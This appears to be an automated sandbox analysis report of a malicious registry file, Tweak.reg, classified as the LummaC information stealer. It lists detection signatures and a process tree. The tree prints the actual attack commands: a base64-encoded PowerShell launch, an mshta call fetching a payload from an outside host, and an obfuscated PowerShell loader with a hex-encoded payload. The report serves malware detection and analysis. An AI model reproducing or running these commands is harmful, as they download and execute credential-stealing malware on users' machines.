Windows
Analysis Report
Tweak.reg
Overview
General Information
Detection
LummaC
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Yara detected Powershell download and execute
Creates an autostart registry key pointing to binary in C:\Windows
Creates autostart registry keys with suspicious values (likely registry only malware)
Encrypted powershell cmdline option found
Loading BitLocker PowerShell Module
LummaC encrypted strings found
Powershell drops PE file
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Suspicious MSHTA Child Process
Suspicious powershell command line found
Uses regedit.exe to modify the Windows registry
Very long command line found
Binary contains a suspicious time stamp
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Powershell In Registry Run Keys
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
regedit.exe (PID: 6696 cmdline:
"regedit.e xe" "C:\Us ers\user\D esktop\Twe ak.reg" MD5: 999A30979F6195BF562068639FFC4426)
powershell.exe (PID: 6908 cmdline:
"C:\Window s\system32 \WindowsPo werShell\v 1.0\PowerS hell.exe" -eNC LgAnA G0AcwBoAHQ AYQAnAGgAd AB0AHAAcwA 6AC8ALwBwA HcAcwBoADI ALgBwAGEAa gBhAG0AYQB zAC0AcwB0A G8AaQBjAC0 AZgBhAGkAb ABpAG4AZwA uAGwAbwBsA C8AdwBlAGI AZABhAHYAL wByAGUAZwA vAEQAbwBuA GEAbABkAEQ AdQBjAGsA MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 7032 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) mshta.exe (PID: 7176 cmdline:
"C:\Window s\system32 \mshta.exe " https:// pwsh2.paja mas-stoic- failing.lo l/webdav/r eg/DonaldD uck MD5: 0B4340ED812DC82CE636C00FA5C9BEF2) powershell.exe (PID: 7436 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -w 1 -ep U nrestricte d -nop fun ction tCqz ac($xDlOy) {return -s plit ($xDl Oy -replac e '..', '0 x$& ')};$S QYQyiT = t Cqzac('2F9 2616FCA1E6 37E204E02A 98BAB656B9 EC67566C63 384DBBA915 194A26AF3C 99FF78C879 D2671A61F9 DE3FFD05CE 7A373EC699 9C11F2AE65 D883254059 A8F5DD52C6 EF70BFD487 7EC5470233 CCF8C213A8 F6C3B33F72 7D7EFEF9E3 17E238D517 54C64F55FD 36A2589609 D7C1378106 4CD0882248 925DC090ED 875EA7328A 961D8F19BD A01E615861 B627059F79 049F57B324 7A84C248BA 78C0860340 3E1AE25A41 B0A8E9DD38 F8C4A4081D 4274AE3883 8865951679 0B04238778 E0F5658CC4 E7B8F740A8 31B86CE3EF D019A79F77 BE8F78EB2E 2CA234D0C6 D81A7CEACE 3F908562BA 1EA41EAB6F F399EF717A A496847BEF D1DEB1F7B5 AA3887325A BF9EEF02FE 6982E64EC9 D3A2425D14 C12AD043DC 5C6031BE47 43B30CB977 1A566A007E 0652155220 47C54A3A10 753B2A266B 4BE44ABB6C C95BD1C8F0 9E68F17760 528BCA6460 C89ABD1128 54B22D2A30 FEFACBDAD9 1533869CBA A510D9AEE6 DFA15E320B 7AFD602017 85519583AE 149ADC0F90 A8952F25FF 47A4ED635E 1B047ACFE7 3F6A3F4DE1 4C2A855847 AF9BE35A9B 33A08C7ABF 7A00F27594 B28D5E0FA5 1AA3F90BF2 4D901F140F 816D5D4EBF 7AA6FA485F DC8089FEF1 D65D5798A7 A7C513EFB0 5E816E80A2 F1DDFE3BA7 6DA0E722B3 8F8740DCB9 E6E71B59D4 E4CDFAA9F2 EF98D1569B 83EA767399 99F4AFC232 F29ABC60B9 04DFCCA5F1 15A5A8559E 36094E8F37 943EFCABA2 3E670D451C E32C68AD30 28B217CEEF 7FB1CF47C9 7D30D069B3 F065987B4F 034029EE5D 245366FE89 7472BBF683 58F983C438 8E9EDBE009 B15763EA5A 4C065248C0 153CB15A28 1585BC9621 504C2AB9E8 F3BA0A95A0 DCF141ADD7 A86BB23134 BB59CE4694 3F1107FE42 751B10616A 7FA72EA7AA 54509CB028 31AE69BDF9 4A6D6FED1A 11CEBA936D 6B8DE427BD ACBAA0AAD1 A7CFBEB89E 6108DEF6F0 852AF4BB67 846A3ACF80 6D21D324D0 C50B0F62CA D51058D241 391A6B2446 D777805760 A992C50DBC 13108296D9 69C721CEC4 BA28B6488A B72DF32BD7 55FC7D5C5D 3D56680F0A AB9BDC8DD6 64CBBF8E2B CDD8246277 8CEF31E33C 24A4749F12 603EB49D4C 9D110A1710 7C7B97C1E5 4EB654988E 65CE15CD96 9F93C091DF ABE466D712 28914296A7 3B782ECF0F FF3DF80313 CA3128BCD8 296F524EE3 5DB155C2AE 0EF4C69075 B57E36D24E 8E31218CA6 0AA4FA1686 57C062B42B 2F5EA45AAF DBF6276668 F6A9F86718 4E90C03C86 C65BCCE496 54A66FA3D3 06694FFACD D32F762E1D 88075F651C 9159F15813 EEE0CA477A 8C578C19D4 4D1E39E106 809A3CD869 B8E088ACDC CE32E23A70 F5F942E8DA EE3012D81B 73B3B94D05 D727127DFD A24F3F54EC 5E3BFAC831 21DF59E941 DC4ACA17CA 5EAD44C61D E8BDF84E32 290F7543AB E02060DC41 362B94A5F0 7EEEE330B9 7553B46859 432CC68F21 4B302C4E6F 63055D0F83 E01F7974F1 B300238EEC 9B49AC5DE3 C1D9A3ED90 F4056FDACE 9CD348ACE2 412CC387A9 FF17100724 C029B670EA 9C692E997B FF90AA0531 E793E1DD41 54E64151DC FF01CCE768 C6DB40FFFF 11494DF2DB 99E1C11598 73FA31A4E0 EB1036654D E9137700E2 75DE2AE79B CB348D2132 15787A6A34